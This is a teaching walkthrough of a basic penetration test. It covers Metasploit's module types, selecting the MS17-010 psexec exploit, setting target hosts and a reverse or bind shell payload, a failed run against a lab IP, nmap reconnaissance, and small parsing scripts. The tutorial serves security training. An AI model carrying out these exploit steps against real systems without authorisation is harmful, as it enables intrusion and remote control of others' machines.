Performing a Basic PenTest
(OBJ 5.5)
Metasploit
- Multipurpose computer security and penetration testing framework
- Encompasses a wide array of powerful tools for conducting penetration tests
- Included by default on Kali Linux
- Allows you to open multiple command sessions at once and send sessions to the background
Starting Point
Example using msfconsole command:
┌──(macc㉿kaliLab)-[~]
└─$ msfconsole
Output:
Call trans opt: received. 2-19-98 13:24:18 REC:Loc
Trace program: running
wake up, Neo...
the matrix has you
follow the white rabbit.
knock, knock, Neo.
(ASCII-art splash banner omitted)
https://metasploit.com
=[ metasploit v6.4.64-dev ]
+ -- --=[ 2519 exploits - 1296 auxiliary - 431 post ]
+ -- --=[ 1607 payloads - 49 encoders - 13 nops ]
+ -- --=[ 9 evasion ]
Metasploit Documentation: https://docs.metasploit.com/
msf6 >
- Every time you load it, you will get a different splash screen
- At the bottom it tells you how many exploits, auxiliary modules, post modules, payloads, encoders, nops, and evasion modules there are
- Exploits
- 2519 exploits
- Simply some piece of code or software that can deliver a payload and carry out some sort of attack on a given target.
- Auxiliary
- Includes scanners, sniffers, fuzzers, spoofers, and other non-exploit features of this tool.
- Post
- Any additional task that you may need to perform on a compromised host
- Stands for post-exploitation
- Payloads
- What exploits deliver and then run
- When you run them, they give you control over the machine, elevated permissions, etc.
- Encoders
- Ensure payloads make it to the destination in one piece and undetected.
- You may encode or encrypt things to bypass different intrusion detection systems, firewalls, and router ACLs
- Nops
- A non-operation (no-op) instruction
- Used to keep the payload sizes consistent across all the different exploit attempts.
- Also useful as part of your evasion
- Evasion
- Ways to try to get by or get through some sort of defenses that somebody has set up against you.
Searching for vulnerabilities
- Example: you know that port 6667 is open for IRC, running the UnrealIRC daemon, and that it is a vulnerable version.
Example using search command:
msf6 > search irc
Output:
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/windows/gather/credentials/adi_irc . normal No Adi IRC Credential Gatherer
1 exploit/multi/local/allwinner_backdoor 2016-04-30 excellent Yes Allwinner 3.4 Legacy Kernel Local Privilege Escalation
2 exploit/multi/http/struts_default_action_mapper 2013-07-02 excellent Yes Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution
3 \_ target: Automatic . . . .
4 \_ target: Windows . . . .
5 \_ target: Linux . . . .
6 exploit/linux/local/docker_cgroup_escape 2022-02-04 excellent Yes Docker cgroups Container Escape
7 \_ target: BINARY . . . .
8 \_ target: CMD . . . .
9 exploit/windows/emc/replication_manager_exec 2011-02-07 great No EMC Replication Manager Command Execution
10 post/windows/gather/credentials/halloy_irc . normal No Halloy IRC Credential Gatherer
...
- Searching for that service to see if there are any modules associated with the vulnerability
- Everything that has 'irc' in its name or description will show up
- Looking at the path of each item you will know the OS and where the backdoor is basically located.
- Now you can just type use 8 (or any other number from the list) to select the exploit you want to use.
EternalBlue example
Selecting Exploit
Example using use command:
msf6 > use exploit/windows/smb/ms17_010_psexec
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_psexec) >
- exploit/windows/smb/ms17_010_psexec is an exploit that targets Windows systems over SMB, named after Microsoft patch MS17-010 from 2017 (the patch associated with EternalBlue)
- Now the prompt shows what exploit you are going to be using
Viewing options
Example using options command:
msf6 exploit(windows/smb/ms17_010_psexec) > options
Module options (exploit/windows/smb/ms17_010_psexec):

   Name                  Current Setting                                                 Required  Description
   ----                  ---------------                                                 --------  -----------
   DBGTRACE              false                                                           yes       Show extra debug trace info
   LEAKATTEMPTS          99                                                              yes       How many times to try to leak transaction
   NAMEDPIPE                                                                             no        A named pipe that can be connected to (leave blank for auto)
   NAMED_PIPES           /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS                                                                                yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT                 445                                                             yes       The Target port (TCP)
   SERVICE_DESCRIPTION                                                                   no        Service description to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                                                                  no        The service display name
   SERVICE_NAME                                                                          no        The service name
   SHARE                 ADMIN$                                                          yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain             .                                                               no        The Windows domain to use for authentication
   SMBPass                                                                               no        The password for the specified username
   SMBUser                                                                               no        The username to authenticate as

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.64.2     yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

View the full module info with the info, or info -d command.
- Different options you will use based on this exploit
- By using options you will see which options need to be set
- RHOSTS is the target host you want to go after
Setting RHOSTS
Example using set rhosts command:
msf6 exploit(windows/smb/ms17_010_psexec) > set rhosts 192.168.1.2
rhosts => 192.168.1.2
- You will now see the RHOSTS value listed in the options menu
- RHOSTS = Remote host(s), or the IP you want to target
- RPORT = Remote port you want to target
- LHOST = Local host (your machine's IP)
- LPORT = Local port
- The payload options are what we are going to do once we run that exploit.
- You have to run some kind of code afterwards; in this case we are setting up a reverse TCP shell using the Meterpreter shell inside of Metasploit
- This will allow you to keep a connection to that machine for more data gathering and so on.
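The options table above can be checked mechanically. The script below is an added example (not part of the course notes and not Metasploit's own code): it parses the msfconsole options layout from a constructed, unwrapped copy of that output and reports which Required options still have no Current Setting, which is exactly why set rhosts has to happen before run. The sample rows are a subset of the real table.

```python
# Constructed sample of msfconsole "options" output (subset of the real table).
OPTIONS_OUTPUT = """\
Module options (exploit/windows/smb/ms17_010_psexec):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   DBGTRACE    false            yes       Show extra debug trace info
   NAMEDPIPE                    no        A named pipe that can be connected to (leave blank for auto)
   RHOSTS                       yes       The target host(s), see https://docs.metasploit.com/
   RPORT       445              yes       The Target port (TCP)
   SMBUser                      no        The username to authenticate as

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.64.2     yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port
"""

def parse_options(text):
    """Return {name: (current_setting, required)} for every option table by
    slicing rows at the header's column positions, so a blank setting is ""."""
    lines, options, i = text.splitlines(), {}, 0
    while i < len(lines):
        header = lines[i]
        if header.strip().startswith("Name") and "Required" in header:
            cur, req = header.index("Current Setting"), header.index("Required")
            desc = header.index("Description")
            i += 2  # skip the header line and its dashed underline
            while i < len(lines) and lines[i].strip():
                row = lines[i]
                options[row[:cur].strip()] = (row[cur:req].strip(),
                                              row[req:desc].strip() == "yes")
                i += 1
        i += 1
    return options

def missing_required(options):
    """Required=yes options still blank; msfconsole refuses to run until set."""
    return sorted(n for n, (val, req) in options.items() if req and not val)

def apply_set(options, name, value):
    """Mimic 'set NAME value' (option names are case-insensitive in msfconsole)."""
    key = next((n for n in options if n.lower() == name.lower()), name.upper())
    options[key] = (value, options.get(key, ("", False))[1])
    return options
```

Calling missing_required on the parsed sample returns ['RHOSTS']; after apply_set(opts, "rhosts", "192.168.1.2") it returns an empty list.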
Show and select payloads
Example using show command:
msf6 exploit(windows/smb/ms17_010_psexec) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/generic/custom . normal No Custom Payload
1 payload/generic/debug_trap . normal No Generic x86 Debug Trap
2 payload/generic/shell_bind_aws_ssm . normal No Command Shell, Bind SSM (via AWS API)
3 payload/generic/shell_bind_tcp . normal No Generic Command Shell, Bind TCP Inline
4 payload/generic/shell_reverse_tcp . normal No Generic Command Shell, Reverse TCP Inline
5 payload/generic/ssh/interact . normal No Interact with Established SSH Connection
6 payload/generic/tight_loop . normal No Generic x86 Tight Loop
7 payload/windows/custom/bind_hidden_ipknock_tcp . normal No Windows shellcode stage, Hidden Bind Ipknock TCP Stager
8 payload/windows/custom/bind_hidden_tcp . normal No Windows shellcode stage, Hidden Bind TCP Stager
9 payload/windows/custom/bind_ipv6_tcp . normal No Windows shellcode stage, Bind IPv6 TCP Stager (Windows x86)
10 payload/windows/custom/bind_ipv6_tcp_uuid . normal No Windows shellcode stage, Bind IPv6 TCP Stager with UUID Support (Windows x86)
...
- Will show us all the compatible payloads that are known to work with this particular exploit.
Example using set payload command:
msf6 exploit(windows/smb/ms17_010_psexec) > set payload 8
payload => windows/custom/bind_hidden_tcp
- Or you can type the whole path of the payload
Run
Example using run command:
msf6 exploit(windows/smb/ms17_010_psexec) > run
- In this case I do not have a vulnerable host, so it will fail
Output:
[*] Started reverse TCP handler on 192.168.64.2:4444
[-] 192.168.1.2:445 - Rex::ConnectionTimeout: The connection with (192.168.1.2:445) timed out.
[*] Exploit completed, but no session was created.
Using Nmap for Reconnaissance
Example using nmap command:
┌──(macc㉿kaliLab)-[~]
└─$ nmap 192.168.101.186
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-07 20:01 MDT
Nmap scan report for 192.168.101.186
Host is up (0.013s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
Nmap done: 1 IP address (1 host up) scanned in 13.44 seconds
- When the actual IP address is known you can just type it and you will see all open ports
- If you do not know the exact IP address you can add /24, as in nmap 192.168.101.186/24, in order to scan the entire /24 subnet and see all hosts. This will help you identify the host you are looking for
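As an added illustration (not from the course notes and not nmap's own tooling), the script below parses nmap's normal output in the format of the scan report above, using a constructed two-host sample (the second host, 192.168.101.200, is made up), and uses Python's ipaddress module to show why 192.168.101.186/24 covers the whole 192.168.101.0/24 network.

```python
import ipaddress

# Constructed nmap output modelled on the scan report above (not a real capture).
NMAP_OUTPUT = """\
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-07 20:01 MDT
Nmap scan report for 192.168.101.186
Host is up (0.013s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
Nmap scan report for 192.168.101.200
Host is up (0.020s latency).
Not shown: 998 closed tcp ports (reset)
PORT     STATE SERVICE
445/tcp  open  microsoft-ds
6667/tcp open  irc
Nmap done: 256 IP addresses (2 hosts up) scanned in 21.30 seconds
"""

def parse_nmap(text):
    """Map each scanned host to a list of (port, proto, state, service)
    tuples taken from nmap's normal (non-XML) output."""
    hosts, current = {}, None
    for line in text.splitlines():
        if line.startswith("Nmap scan report for "):
            current = line.split()[-1].strip("()")  # also handles "name (ip)"
            hosts[current] = []
            continue
        parts = line.split()
        if current and len(parts) >= 3 and parts[0].split("/")[0].isdigit():
            port, _, proto = parts[0].partition("/")
            hosts[current].append((int(port), proto, parts[1], parts[2]))
    return hosts

def scan_scope(target):
    """What 'nmap <target>' covers: with /24 the mask is applied to the
    address, so the whole 192.168.101.0/24 network (256 addresses) is scanned."""
    net = ipaddress.ip_network(target, strict=False)
    return str(net), net.num_addresses

def hosts_with_service(hosts, service):
    """Hosts that expose a given service name with an open port, the fact
    you need (e.g. 'irc') before picking a module with 'search'."""
    return sorted(h for h, ports in hosts.items()
                  if any(p[3] == service and p[2] == "open" for p in ports))
```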
More examples using nmap can be found on Fawn, Meow, or Dancing (HackTheBox machines)